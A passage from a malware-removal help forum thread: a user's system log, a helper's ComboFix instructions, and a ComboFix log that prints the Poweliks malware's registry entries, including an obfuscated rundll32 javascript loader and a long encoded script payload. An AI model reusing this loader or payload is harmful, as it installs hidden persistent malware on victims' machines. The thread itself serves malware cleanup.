Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ES_419\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ES\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\EN_US\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) System errors:=============Error: (08/25/2014 09:53:10 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 09:41:01 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 09:31:53 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC) Error: (08/25/2014 09:21:25 AM) (Source: DCOM) (EventID: 10010) (User: )Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (08/25/2014 09:20:08 AM) (Source: Service Control Manager) (EventID: 7024) (User: )Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026) Error: (08/25/2014 09:18:52 AM) (Source: Service Control Manager) (EventID: 7026) (User: )Description: AVGIDSDriverAVGIDSShim Error: (08/25/2014 09:18:51 AM) (Source: Service Control Manager) (EventID: 7000) (User: )Description: vToolbarUpdater%%2 Error: (08/25/2014 09:18:51 AM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: AVGIDSAgentAVGIDSDriver%%31 Error: (08/25/2014 08:23:12 AM) (Source: DCOM) (EventID: 10010) (User: )Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (08/25/2014 08:19:07 AM) (Source: Service Control Manager) (EventID: 7024) (User: )Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026) Microsoft Office Sessions:=========================Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time. This session ended with a crash. Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time. This session ended with a crash. Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time. This session ended with a crash. Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time. This session ended with a crash. CodeIntegrity Errors:=================================== Date: 2014-08-25 09:48:31.237 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:31.054 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:30.886 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:30.700 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:30.286 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:30.009 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:29.734 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:48:29.432 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:47:50.973 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 09:47:50.762 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHzPercentage of memory in use: 65%Total physical RAM: 3060.46 MBAvailable physical RAM: 1043.32 MBTotal Pagefile: 6355.21 MBAvailable Pagefile: 4190.75 MBTotal Virtual: 2047.88 MBAvailable Virtual: 1907.04 MB ==================== Drives ================================ Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:221.74 GB) NTFS ==>[Drive with boot components (obtained from BCD)]Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFSDrive g: (IT Drive) (Fixed) (Total:465.76 GB) (Free:188.98 GB) NTFS ==================== MBR & Partition Table ================== ========================================================Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS) ========================================================Disk: 1 (Size: 465.8 GB) (Disk ID: BADAE880)Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS) ==================== End Of Log ============================ Link to post Share on other sites More sharing options...
Naathim Posted August 25, 2014 ID:871055 Share Posted August 25, 2014 ComboFix failed to delete the infection, probably due to SpyBot working in the background. I recommend to uninstall it, as this program is too weak for today security expectations.Also delete your version of ComboFix (simply move it to your Recycle Bin) and obtain a fresh one from provided link before the next scan. SpyBot S&D WarningMVPS.org is no longer recommending SpyBot S&D due to very poor testing results (scroll down and read under Freeware Antispyware Products).My advice is to get rid of this program. To do so:Press the + R on your keyboard at the same time. Type appwiz.cpl and click OK.Search for SpyBot, right-click the entry and click Uninstall.Please do it, cause it may hinder the removals. Scan with ComboFixThis is a very powerful tool that should be used only if advised by Malware Analyst.Do not run ComboFix on your own!Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.Temporary disable your AntiVirus and AntiSpyware protection - instructions here.If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.Right-click on icon and select Run as Administrator to start the tool.Accept the disclaimer and agree if prompted to install Recovery Console.Do not take any actions while ComboFix goes through your System - it may cause it to stall!This scan may take some time!When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).Include that log in your next reply. If you'll encounter any issues with internet connection after running ComboFix, please visit this link. If an error about operation on the key marked for deletion will appear after running the tool, please reboot your machine. Don't forget to re-enable your previously switched-off protection software! Link to post Share on other sites More sharing options...
jjoyner1985 Posted August 25, 2014 Author ID:871058 Share Posted August 25, 2014 Programs and Features does not show a Spybot entry. I have also looked for it in the Start Menu as well as C:\Program Files. There are no references to Spybot in either of these locations either. Since this is a 32-bit OS, there is no Program Files (x86). So, no need to look for Spybot there. Any recommendations? Link to post Share on other sites More sharing options...
jjoyner1985 Posted August 25, 2014 Author ID:871063 Share Posted August 25, 2014 Wait. I see it now. It was the portable version. So, I'm going to clean it out and try the scans again... Link to post Share on other sites More sharing options...
Naathim Posted August 25, 2014 ID:871064 Share Posted August 25, 2014 Link to post Share on other sites More sharing options...
jjoyner1985 Posted August 25, 2014 Author ID:871071 Share Posted August 25, 2014 Here we go. Combofix log: ComboFix 14-08-24.01 - savas.kyriakidis 08/25/2014 10:55:04.4.2 - x86Running from: G:\ComboFix.exe..((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))...CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.You should verify if current CLSID data is correct: .HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5} <NO NAME> REG_SZ Thumbnail Cache Class Factory for Out of Proc Server AppID REG_SZ {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}.HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32 <NO NAME> REG_EXPAND_SZ %SYSTEMROOT%\system32\thumbcache.dll ThreadingModel REG_SZ Apartment.HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32 <NO NAME> REG_SZ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) a REG_SZ #@~^WX4AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+* Y.zPhxlc3XwC NAx\bDKU:xO?DDrUT/`rYhbxNb.YJ*ia'A_Ew'/z/Dn:2 wwSkx[GS/2WSnM/4V^--7FcT-'wGhDd4VVcn6Ji6xU+SPzmOk-nor8L^YvJj^MkwOr o sbs?zkY:r(L^Yr#I0!x^ObWx,^N `#PO.XPDY;DU~mR]+T]+mNcE_|S\w'/G0DAmDn'-skmMWkG0D-wxY~WMl:AWM3PknOEa-'x[www7 !cX!F {w'/wEbp8^lD^4`n* M+Y!D ~!p8N0!x^ObWx,[`!# XxU+SPzmOk-nor8L^YvJ\dX:V+ U+.\.oHJ_K:nR+RZE#p6 Wa+UcrM2:E~!~0msd+*iXRd+U[v#IE6U'mR3aalx[3 \rDKUs+UD?DDk okcJuYn:a]wwr#_! /!4/D.rxT`!RsldO&x[+X60vJ&E*_FbI!0UY{;6xQrRD:wri!WY{0 ZM+COK+XOsbV+v;WxD~DD;+SR8#Ik6cE6Yb`!0Y MkO+vacDnkwKx/AK[X*i;0DR/sK/+vbi!0'6 /DlD+P+aOwks+v;0 ~O.!+#I;6Yx0c!YobV`E6xDbi!0d'!0O }w+ )/:+6DjODls`bi;WkR]+m[`y#I;6R.rD+cE6dcInmNvE0DRUryO+#*i;WkRZ^G/`#p;WR;VK/n`bI6R9+^nYsrs`EWUD#Ilc]!xcr-rJ_!0 QJ'J~z$ErnDPz GD/Ym.OJB!BFbiW G+s+DnsbVnc!0xbI)8Atbs`Z6RwkV2Xr/D/cw*#`r6`m9U`*''Zb`NvJr#I8[crtOYalzJNGA VWC[c:rmMGkWWDR1W:JNKAx^WCNJb&{J*zz{*~Z!8{Rv2ZAO*G9 %obWRbwAX/yFA)/lc&bU9WAkvc!OnAO%O&TOX% s/Erbi)`lc3U\bDKxh+UOvJKDK^+k/Eb*`JCE*'Eka,`,:+XYRAx1GNbxLT=))j;qqc!+D?YMrUov$;WU\n.DTl)w.WsACdvcjOMkUovv9CBl+y}F(:gTlq,;qVNVn8At1hsDqZ48iMwXIqV[!jXFs~-myVTCq,EKPz/Pw;\MoZ429*h?"im .s|j!L 8I*1!.((.ZLBs~t1:oYtp"V^xtd8A4^ssYtp"V^k4}(&HaNVV\(LZa|j!L8IX^V.N&/IU}("q^:lj($VK#D8 ^V(U3{BwI*^!jZ[^d\M#HnjYA1C~34yF4lq*[6Nwf9p9H}lT]MOYIsEJV"Vt:^;}`IX8ssYC gA^&gs(Bk+UoW::jfS`,rls.%[;AKp1Z}Z;i:j:(M#L[!^\8kl$m21s8q9/nilt8`G&VB^}s6VI&"s}AIs4V.UeoIV&r3aSsDPn(g!\TEihj:8Mj%NVV-8b*s8 ^!J3w"1 #D5s6*5xj24VIsm0s%ey.y1q!+rVxq8k0E"M#:C lV]C^;5qF2eZF\tuj/t?TrUXg}qF\1x^H4yIq4VjrJ;I:I 6.}?0;]Mj:mXV#u^ht?TrN;qd(01/epgyJs~qI:aa5H6K\wd}qpdpq*"C`1/Ip1.S2wq[MOf(Moy^z&/ FgXm2Is8U*1[ X!Cg41&]A}q6V\ wT}j!2rHIinoAV5U.a4M"s^kl2\tw8hjf8 l"N_9qe2I\^rTkiV"P1M#Nlqs/::wO}U6(lqIs} VKm mkjCjr8M^L&ka4if^y[MjOS^9sts6Vef"w8 W;5 ok4VVE\!g-4 }s4 I28y*yoPW+j&"48:"t1:}/Bo~t^:wO}oIs^ HwJsgV[2^O1Ma^4q.E9MwTlq,;Is64t2HW&s984x"28`/:oEe 9VtZ&2rHIinoAV}Ujw8M"s1kXA}q}w(:jH}oIG4ypG(0VE9h,M}?&d(V~FI:awezXqC"sp VPCqm/Phj&i X-9Zaqlo9!9wdqbhVjs.T[o9EjuVS}?SViMwXIqV[!jX^X0;jy.TjqFh8!jYtlTI(]a4y*M(MwUmHorj .;[VVY\j6g5l4t j3&kVG^hj![(x;q;IinoAV}Ujw8M"s1kXGms.t9Mji+oAs|;3{Wq}F(h1ZlO;(M9tF$t^hwY(Z48jVszeqFV[!jXFs~-1 sZlq,EhKzdKqs;}VsT829*hjI`mxjsF.ZoqFH!^h^EtFZL9AF-t_./tjX4iMwzIq^NV.Xns~-myVTlq,;K:2/: s!}MwT8&x*h?]j^UjVF.ZL81T^sVEtqZoBs~z( H^}_.X\?0{9w1Xm2Is8`sy1+.D5:XXK.DA1C$28+8tCl[rNw9[o9Xt l!]MOOIs!S0NV92w"my.O5s62toHWnp6olMjzt?8nI:2Vef"GBsR;Iy6-ess/}pgyt8r(CsG5q1W\?zOpq*Vq;IWJ06\I+sZlO;JVgh(Ms!F/xmpZ&2H!apU*s^pjt8CtG&VHlm2IV(?lV4Vhr|o!{Bw.E1+ss}jl4[M^ \jqV[!4\tCt19w1X^2IV8iwy^ jOI:alS0NV9s"XmVjGq0F2e29\1+,sNZlpCWytkX.8Ugtt:j65oI2[s.1tp"W8 ""&kVFms.!9(x;q;I#4 14ts.rIpIaN:jHt("W( ]yJV9V[28sNVt-t;ok]+j!iCx-I!o0}_9V1&tr|U*B4 }-CyjWx!*84MSd}Z44`&sy[!jYJVxq4 I28qjEj l!t(x-1sH^m }wI j"S0t44sIdtj9V\s!KK:jfJjOkm:#L[/~Kn(gT}q!;i .E[!^Yt?lB(x]^ms,h` jzNsV%}oH;jVsE\!6^j:jhFZ4r\(^YP+x;tgTqAV;[wA!^r0/Bsj;1 os}`*t9M^+}`FsNVt-t_HE"+.ZKjTCMO3nZBCtp"18 "q4V.(eq*38!`kF?lB(xt7lyjWxMlq4Vhdp;oVPq,39 6^|?02F?S3`CB\e+j3[(xs|U3{WjYZnp"V F8[&Z]SnjYf( l+}o9T(:W] 9\(i94m `+Hsg!1:sEtzTk#V^+mym.nV,t8p"}e8 (sj.8V("&~Xs,dIsFdC_sk( snjVa* wYj:qw##9V#!9Am8w-8A}\]h46PKx4UVB4?^Vtm3aOlj.pl8Nu82.l(+6VmMXG^.aCIj2?e 4}e8*4qV##2s(]+w|i:w*(sj.2.lU!jfp`s$pooA As( 6l}28V]x4qj:4k]i4qi:gGmy9u6qwcCq41}j^T5j]VKZI&5(4p+GAejjIu6qtl: IVHjj*^s^E:24?t!4We ldp t. V1AP "M^!jV(M]VIAt?IVxX5N96p oA#.Il"q9lV9rjsxkC2L6oaM[:99K_V!t`6f#+w2t.gfq]:.Z6Lj2g6.^wU+b,X[ V;`sqMlX]#:82UV#: hKX[ D!H`9.t`p\[f4*H:O}d!]&j:.n}MTa+s,T.01B[A1pUpIwIj42]sa:\!oa63dhtjg9kv1/n`6(}qghijxu"f4 jvsad&wf}v.2?^tsn`w?\#1VN!A.]9x5joAPfgHCKwo:5*8`65tp^HtMj2:sBsl`62Ug}N_NjIVViZNxtsoWpjw}j ^.ty$;##4I}?OBmw9hiZ6?tU^H M\]"fBxmA.Z\2A+j0q"jqI]8b,?\UVA}:\fp:gfj!]:tu9rtswk?sis}zwjtsgr#mx$x[g4ac*u("6r`va5z9r}`i*"uanimx/\jxD5!}D}P^*HL"}1Ap"#`Iw o4&Jy~egMVSGInts4.5y,pK^9%}^s.9%Vqr2^T\jg99#I}VjA}j^(IZ9/]`sA]f~Aejw$9!o~p`py9L^.`N-pU%X}Zw?\hVVN!A.]j\x"joAjp"H#3^64GV$}ZhDi3OD]f9V:2txHj.C`!w+jNt181f w1guIdp!^"njRcgKBA8f\nCMgdHA}t[GVfjp"*]2^(U2B;I`sA5.z"l:1-I`2-C wh5j/.j&9rJFx:`!]&C 1F#M\j+owt[_Np}#~&CK5+5jo~p`sxt&9/IAs/Hw1t\:tA`pVtIC9}j.j:}.e!j XMHj^epqI9[`65[qw2 M\51347mZIWI!&qp^2.H2NK^Ztwt9HZlVj]jjw/"Z13t#5\#:\9?02tiaizjiz&}j4e\MVSGIx}Mg#}2W*pqIr[`6;1#s~pjw9jV"V5!a;^iwA}jw9KG99[V.r}#~9tyxet2ohm.9wt.4UK8}eHV1#Z*9hwU1:l]Ca5m!sw#s4&]f9%ww- w13}p^ZHCI*`2o~p`ph5j8jpj9aI_tfP;,j\VqX1jw!\K^A`21w\TjsCM\CHomT[AVpjp"1}!gG1jo_4Zq\tFjBp:t5S.As^Z11}39sMX+jx9W5joxtp99}.w$pj} sZ]+9APjw$5(t pjsA5jxp5qN3SZ}4no9f`TNt13^e[25!j2XAiiwA#Kw%+NqaPs%\["4A}j\ed&]Gjq,A`jw$Ko19K;,t[0%cgUq7IVgX^!gK"!t&}jDnC:9op`sB^.3\jfg|j.9G1&B lyt\kOer:VG4yNJHAw9`U}b.:\hex4d`oq}i5\\K"epqI3\`stj!^F}Fg!`sjjqYC`ZOelV1/HA6B[^sSt#sMIjX.]2wI5jon6iIX}O+js3"iqYsjPAcj3xP:CsyKyYcmFw#I0s9I_N$#HYA5Vs~pjO"}!Zc5!t&}jDsj9op`su8Zttj#gF}Fg!jk1W.sYX5DGloWAN29$Cytx}osglMg/\jj5xoK#+^1^:9.l;%fiqYS}ijA}.z-qMo;j`Yfmj96j01]j.}6w5\Uf1n?.^e}j5!jM#A}iwAPK4/pqN\`F1ipgW]f\6jjq"mytL\F95.ZIoKAVp8ZVt:hV8pFg!#kOcj:OX} DWty4]Kqt%}Ns?H+D.} 9-mMVWIZ*.5j9F.01]jqVG}0sW:VWX|FgT]jaZ5:0Fj""|j.\!48IJ6Aw9i#9X}jw$5.#_ljVX9 DG.s6eSZ}e}21f`TNA+2x*^jwM5Ve\HqwDj!wop`s}J8tttTl\\2k*U3sq;,MjFg"p81uI_t$n`}&Uo}I}&KaPj8I1 42\T^SnC9 5ZF]^ytAiiwA}jDoqjH24yo\g!w$I`s$pqs6i2}f`T}o.:I*#:gS9!29 #~s]j"}5^ja}^5\HqwDj!wo5jo5S8t\`:9\pyV!.;%f}`ss5is~pVw]i3wA5V3\HqwDj!wop`s}J8tWtugpCsjinX07rq,AUjw$p`}6.b,*#y,69+YKfw+J&"f`.#AiiwAJ&4#529$Cyt5Cs~A s^("jH~I`sA:j^op`}pKGNBiV/DUit.mjwo}jwMqV4;##wDjj\/4ZsUj`sAi94j3DfU3so4ZNt\!\apo5*.0,J[Zw9qp}2}XRfJ!5!`!HA}iwAPK49Ks}9ijs6HUjX^Kx-5F[_48sl( Xo?09]+ N!6qFwj#sMIXsPVxf`.#.]hxqi3g]}y}f}`sAt%4]!DfU3s\As3j.a-SH%-Sy5aeb,M`T1.pFgu]x9qjKB;##wD]2\9K^99ij..]hw|t3g]q?1W.q,X5DGlV1/H`tt[A.|5VYt+j8(^2gAnyB*eT4x}!9tI_Vue`w2i 9|} ^u:C48mZY9L4 ?AYf?0VtiA3\tPV^l?D tC1X(!ottT5\t2g]KU,*#:AX} DWtXO5d ]hHjst:w(p81(4Z9+eb%\tip7I:w9^3gKUC(X#s9re3gPKqNsn NA}iwA#KwCqMoDNwVt(.\Olj.pKjNu^_Vl(+6Vl:XG^xYIj2? Vx}e8 4qV##81(]f~y :Od":aVl_s1t:wFj^wCqs5jsFwj#N\.!9-[.a\(2tY8!46 394?^9CnwV16p"YC.jp\oD+wVl( X!4ZN4?^94jsFwj#}NNj5.\3wA"24?##x1eLx!l2oA#0Vj]+Xwe&gV"V]_I VVj.\O+GA jq.o]ZV5jV6&jV"jjsa5`Voc\o`!e ZXl^s%tA}p]qxDe 8 ((LS.0sLt!OBw.\?w9jCAIkt!68+f~#e w5`x$}e+"Mjj9*mV.O#ZV5iq"qi:"j"M(SK Vcts4t^N!Hww%tA5y" 685ygijsxV5:4k8il/CjI"l2oA#q,? !4ht28V"3aVjs,L(.\O+GA#N8VpiZV5j36&j:jG#Mj5:3Bc\o4ye39*N^3*tA5c]VWhe 8d((LSGAk(jBV}r?w9 i }k"q.++f~ j8wgOkP "MF!1Xm8wpjAt?tUT6t2"H(LS.`sH(.x"50VG}A9HtA}f"".k}243jsxICH3\hS nf~#j`6Oi 1kj 43]38V"xo;1AFn1VxOlj.pm2oA#2.Dj 2HlL92jf9&5jol8+XM[39PlAF$}`sAP "M^&tz5#M.sFcts1zHsN(?w9rCV*v\Uw++f~pF!\s(j]yP "M[&".?.V6\qFc\o4C}3Xq:so~+`I&5(^\rAV"H^w-PbYH5hoXKf"TF!89tjX;j X3e!g+1q3A\oNA6!8r]3"OUFt;.ZF1(sw6l^Arp8se#`W\to}2}yta[!"q:Msx\"w&]24]r`%-}Nscjp56^2^T"F$xNA.1UM93+V,T1AwB[AV9UpI"?2^T}j9A`ZOA69"2\Odrow3i;,w#Px9C.\p"sIHq,wj.\UK.tHjVt-#`sA5iIHIMOT\399(fohPf\fCKwpIq3A\0Vw\o41]f9%"#xmZFFq(t*}yN}KyV#\o1;j#}wp?RT^sx(j25 3gHiV49Kw}p[Zphjp~s}Vj]gVB;.0.3`W-j^t9IV}e}jAL9#NA}V4$iM"I:!2:#qg|#s9XK^Iiiow&}+Xre3^T::Bxmw.Zjsw3+`IA.`IiiNsZmT1A|!AXnKI!`f]2\qj2C.T"jq3"\q,?H!S*ej"T}.s&?Z}.tjO6j^sGjU%a#sYw}i1tjaXPMaZ5!oA}iwACK"]jqt$}`sA}#~SC.\ (!Tl? sM"kR"row}H^1B8A}}"u}AIf"4jjwA5jo;#ij1C.j my3A# 1w[TwvJ&96":oxmw.pjVA+I0IGH`9.t`p\9fAlrs^}J!gE`jqx\o\y]3jt1yIp} 3XPf"}e?OtjVXjotsU(goKjs6.ss$P0}tU 6053^"jK\vU!a3#+^| s49K^I3]`1w\q\&]f1qt2X0jjA!m:kfr:1#?H%A# NIqicl5!x!nK`!:LsL}VIh]ZRXIs9B[A*kjpg1Cj"+:M]Nm 9fq("!50V"IqN-8A}}UPsVI!\/#s`!tjt]V5\#V9jjU%a wswJTgri:jG`.iXKZ*?\:4]S.s l8.}6j5hU 6V30a]3DM"Z13e#5\#:"/.VV# A!\6 wri:gG`2j..I." Oo.:paI s!];,jT22Nygf^:0hq2swnVgHtV4XKstf}oNA}ixIJyw mF#x?AtA53w$p`}hS8}pi^2\tqtxSywt62Rc:L4A\hO6#!\3S8}%nV}5Cs~A#y"}":]g401Z5jx lUY*j^. P^NtUA~5jw$[!wA5XOA]VwA}j\t+b%atb,3i aq}Vjf2HlI`*A5jw$S2tp?osfCytw} m2H&1.]^I5joAjPwMF!\/.ys/n_9fCi\jJyg#UsIH.tc9F\HKjs"lAIU}`sA`9tql2D"j3^}q2o3]qx5#Lw6.w5atb,3i aq}Vjf2HlIjAA5jw$S2tpposfCytwdT22rKgj]:w }.[c[q\1P.w"lA.$}`sAi94 jD"U3s\H`5\"3xpS2t#r_sfCytWIT1tj:\*\2j\`f]S8sjrnC9 K`F]^ytsiiwA}jjh13B4K^s1`(gG. 5*.s,J^Zw9\p1tS&4p#(w&m 4\\iwc}&^uK_oa6q.(6!lf}3w/j:VM+`p&"sxi.s,TH`1!t_sC"UIXI O+]sa\(2e&]h4YC.jeNqsU]Z*?tp4ICVjtg2T7rjswqftA+GAeNH,J6Aw9\%tq}!Dfj3^}j2o2Hox*}.w$pq3A 0.w##4DCVjemF#xH`}v"3x-?yN]p`sB\`5D"VI&pVjfn2g*"jtA}iwAC.I"KqVe\8sw 9g}C.T"jsIHy1wqfgUljo"4H,*#NtX5 YKKy4%iMafm!BA}igri:\*jjj-6:2dp gm#2"o:2s"`sa5j5-i^ipm01p]z}&5jywrc9$}jw91 ]1jfg|j.0ai01!}^t\hOlJyge}C42.0F1`(gGp N$p`s}J8IWITs5lMxU}jwA5!ar sgX}Fg(?A9#[2tfnij9}jw$5?0l5`pDUMO}lww.p`s$} sZ"+N~Kjw$}?Ryjjsc[q\1P.w"lA1]}`sA]hI\]:wX13H:IZhc"CI"}AtXK^9]Cw2\tq.x+C9 Pj8I1 4ftTwA}j\Cm`Nh6:2\i/OjCMg/tsosrG9c9F\HKjs"lA1f}`sA`9tqI2D"j3^}(!3\^+9p[Cg/jU,eb,Mi ^X}Fgu531~pqNA5jxIb%XHUYHeZ}j"3.t?.wf}jwA"M0hi9t\Jy"dINVK^Zh\no9.^(9.mM0Xpotfj\-p`V$p`s!twm\oN7m(9.Cf\&dX06[pgCJ&4p.osfCyt\\iwc}&^(d ]s+b,MIjgzp81(m0H-6w}/Uf1n?w6ij8I1 L\\qT!J&4p}2sfCyo [q9;#j"o:2s\NA5*"L^s..t;pZI$}^I( ,w5jw$[!wA5:1Z]94A}j"}H^}+6w}Xjfg|j.^+qj0l1:AL(M"-p`sop`sB\NNZ5V.~pjST]Kx&m 4FiiwF}jw3+ AB\0IZ}VwA}j9G"jq~mytwd&`.HjV]?0VrCZss5is~..~KCXOcj!qX} DWty4]K`!-e0tx[TwI}jw$".$2p`s5:SA?0s*HA1rt.tH9f1K.j\3^3gY\Fsy} DWej"fN01Xj;,M#igX}Fg!jFtk^p 5!"SH%.KGtB[0N5(u}Gp3w9]f9Zms]#sa5ejxXNZ1P]oW\\ \\6ZO(dX0X4wwn 4KSH%-Sys$[Zwfmi}I.LwsjVxf`[w#9w1P.w"l;,*#0.6[+DW#.zXt22;jZw?5Fw.5`1XNZ1P]^o :/,WSXR.]C4Z5:1!jf9|j.95?o9$Cyo\no1h^(9.ms#5rw}hU&gF?jV+`%X6:AM"obHN:I-J!wA5!ac^T4x]j\/;%XP0Nj o4ve9Kn!t~4ZY9j:x-Ns.5SH%ztZ.A`is~5jj9[!gK"V^\no9I^3w.lVm*i`! jo5yJXR.m3#~4ZY9q.zTS2m.I`.Uj`sA"V9742^-j3^LI!tj]3jHj.wop`s$]V,rtP1\Jy"d"j2Gp:Nc9XDoH0sop`sHeZ}j"3.t?.wB}jwA"M1AFzR\Jy1Ap`.$}`s#+9Lj&9-mM4NpNAZt:4BmZs.lG}f#s,w:3sn?I*#VgS1!29ijky}VwU?012]Z6p#Tgy}Fg!jF#_l0Vy5DGNU%*jAs$}^I muNtp&^!#XR*\j]c}sx6}j9-pj}+6w}&jfg|j.\C(!4GmZY9j a"mZs.lwjzty1Y9+,KSy^s]C4Z`Vt8 9.^Fw.l;,*#0V6[+DW[(^P2H:I^I9L4 |ZY"?0Vt As3` t`.xI*#L^S1!29eUgL}&9-lwjz8Zst}f^c}Fg!jX1W.0F69 DG.U%*.^.J^Zw9js}7K3Xoj3^`Z1M#U^y}FguI_t$[2w&]VxIe9F`o Is%\9!jhp`}}SZ} i29f`TNnj3g]#1\mk12Ho"(}jw$pqsU}Z*j}qw\#.9-5:owp2tf`!\]+_N K`F]^ytA9Ts~p.z*#V9S1!29t%0hj3xP?^99iqH\no9x^(9.mM^.NyYC5jw}lAV-p`s$}^}t5Tstp&^!#&4&j3q1ipgW}3w$p`s}6w}wjf9|j.^}"j]Vj;,M\3gzp81!jj}OCA.y` 